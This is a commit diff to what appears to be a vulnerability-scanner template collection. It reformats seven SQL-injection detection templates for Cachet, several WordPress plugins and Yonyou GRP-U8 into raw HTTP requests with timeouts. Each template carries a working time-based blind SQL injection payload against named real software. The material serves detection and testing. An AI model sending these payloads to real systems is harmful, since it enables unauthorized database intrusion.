updated template format for sqli templates with timeout

2024-06-22 22:19:54 -07:00 · 2024-06-22 22:19:54 -07:00 · a4c09b8719
parent 1c64701b76
commit a4c09b8719
7 changed files with 61 additions and 26 deletions
--- a/http/cves/2021/CVE-2021-39165.yaml
+++ b/http/cves/2021/CVE-2021-39165.yaml
@ -34,9 +34,11 @@ info:
  tags: cve,cve2021,cachet,sqli,chachethq
 http:
-  - method: GET
+  - raw:
-    path:
+      - |
-      - "{{BaseURL}}/api/v1/components?name=1&1%5B0%5D=&1%5B1%5D=a&1%5B2%5D=&1%5B3%5D=or+'a'='a')%20and%20(select%20sleep(6))--"
+        @timeout: 20s
        GET /api/v1/components?name=1&1%5B0%5D=&1%5B1%5D=a&1%5B2%5D=&1%5B3%5D=or+'a'='a')%20and%20(select%20sleep(6))-- HTTP/1.1
        Host: {{Hostname}}
    redirects: true
    max-redirects: 2
--- a/http/cves/2023/CVE-2023-6360.yaml
+++ b/http/cves/2023/CVE-2023-6360.yaml
@ -31,12 +31,14 @@ info:
    framework: wordpress
    fofa-query: '"wordpress" && body="wp-content/plugins/my-calendar"'
  tags: cve,cve2023,sqli,wp,wordpress,wpscan,wp-plugin,my-calendar,joedolson
 flow: http(1) && http(2)
 http:
-  - method: GET
+  - raw:
-    path:
+      - |
-      - "{{BaseURL}}/wp-content/plugins/my-calendar/readme.txt"
+        GET /wp-content/plugins/my-calendar/readme.txt HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: word
@ -44,9 +46,11 @@ http:
        words:
          - 'My Calendar'
-  - method: GET
+  - raw:
-    path:
+      - |
-      - "{{BaseURL}}/?rest_route=/my-calendar/v1/events&from=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(2)))a)+AND+'a'%3d'a"
+        @timeout: 20s
        GET /?rest_route=/my-calendar/v1/events&from=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(2)))a)+AND+'a'%3d'a HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: dsl
--- a/http/cves/2023/CVE-2023-6567.yaml
+++ b/http/cves/2023/CVE-2023-6567.yaml
@ -33,9 +33,11 @@ info:
  tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,learnpress,sqli,thimpress
 http:
-  - method: GET
+  - raw:
-    path:
+      - |
-      - "{{BaseURL}}/wp-json/lp/v1/courses/archive-course?&order_by=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))X)&limit=-1"
+        @timeout: 20s
        GET /wp-json/lp/v1/courses/archive-course?&order_by=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))X)&limit=-1 HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: dsl
--- a/http/cves/2024/CVE-2024-1061.yaml
+++ b/http/cves/2024/CVE-2024-1061.yaml
@ -34,9 +34,11 @@ info:
  tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,html5-video-player,bplugins
 http:
-  - method: GET
+  - raw:
-    path:
+      - |
-      - "{{BaseURL}}/?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+-"
+        @timeout: 20s
        GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: dsl
--- a/http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml
+++ b/http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml
@ -15,9 +15,11 @@ info:
  tags: wp-plugin,wp,wp-autosuggest,wpscan,sqli,wordpress
 http:
-  - method: GET
+  - raw:
-    path:
+      - |
-      - "{{BaseURL}}/wp-content/plugins/wp-autosuggest/autosuggest.php?wpas_action=query&wpas_keys=1%27%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F5202%2F%2A%2A%2FFROM%2F%2A%2A%2F%28SELECT%28SLEEP%286%29%29%29yRVR%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28%27dwQZ%27%2F%2A%2A%2FLIKE%2F%2A%2A%2F%27dwQZ"
+        @timeout: 20s
        GET /wp-content/plugins/wp-autosuggest/autosuggest.php?wpas_action=query&wpas_keys=1%27%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F5202%2F%2A%2A%2FFROM%2F%2A%2A%2F%28SELECT%28SLEEP%286%29%29%29yRVR%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28%27dwQZ%27%2F%2A%2A%2FLIKE%2F%2A%2A%2F%27dwQZ HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: dsl
--- a/http/vulnerabilities/wordpress/wp-statistics-sqli.yaml
+++ b/http/vulnerabilities/wordpress/wp-statistics-sqli.yaml
@ -17,17 +17,30 @@ info:
    publicwww-query: /wp-content/plugins/wp-statistics/
  tags: sqli,unauth,exploitdb,wp-statistics,wp-plugin,wordpress,wp
 flow: http(1) && http(2)
 http:
-  - method: GET
+  - raw:
-    path:
+      - |
-      - "{{BaseURL}}/wp-admin/admin.php?page=wps_pages_page&type=1&ID=1+AND+(SELECT+*+from+(select+SLEEP(6))a)"
+        GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1
-      - "{{BaseURL}}/wp-content/plugins/wp-statistics/readme.txt"
+        Host: {{Hostname}}
    matchers:
      - type: word
        words:
          - 'WP Statistics'
        internal: true
  - raw:
      - |
        @timeout: 20s
        GET /wp-admin/admin.php?page=wps_pages_page&type=1&ID=1+AND+(SELECT+*+from+(select+SLEEP(6))a) HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'contains(content_type, "text/html") && contains(body_2, "WP Statistics")'
          - 'status_code == 500'
        condition: and
--- a/http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml
+++ b/http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml
@ -15,13 +15,24 @@ info:
    fofa-query: icon_hash="-299520369"
  tags: yonyou,grp,sqli
 flow: http(1) && http(2)
 http:
  - raw:
      - |
        GET /login.jsp HTTP/1.1
        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
+
    matchers:
      - type: word
        words:
          - 'GRP-U8'
        internal: true
  - raw:
      - |
        @timeout: 20s
        POST /u8qx/bx_historyDataCheck.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
@ -32,8 +43,7 @@ http:
      - type: dsl
        dsl:
          - 'duration_2>=6'
-          - 'status_code == 200'
+          - 'contains(content_type, "text/html")'
          - 'contains(content_type_2, "text/html") && contains(body_1, "GRP-U8")'
        condition: and
 # digest: 4a0a00473045022100ff26707ab7b707eb63657075468f8fb5c9be2587a852c61a038cd6e74f11d80902201a654b27bab1bfb591f1d1cfd0517a439d2b61b67636eff6fac15f5091503614:922c64590222798bb761d5b6d8e72950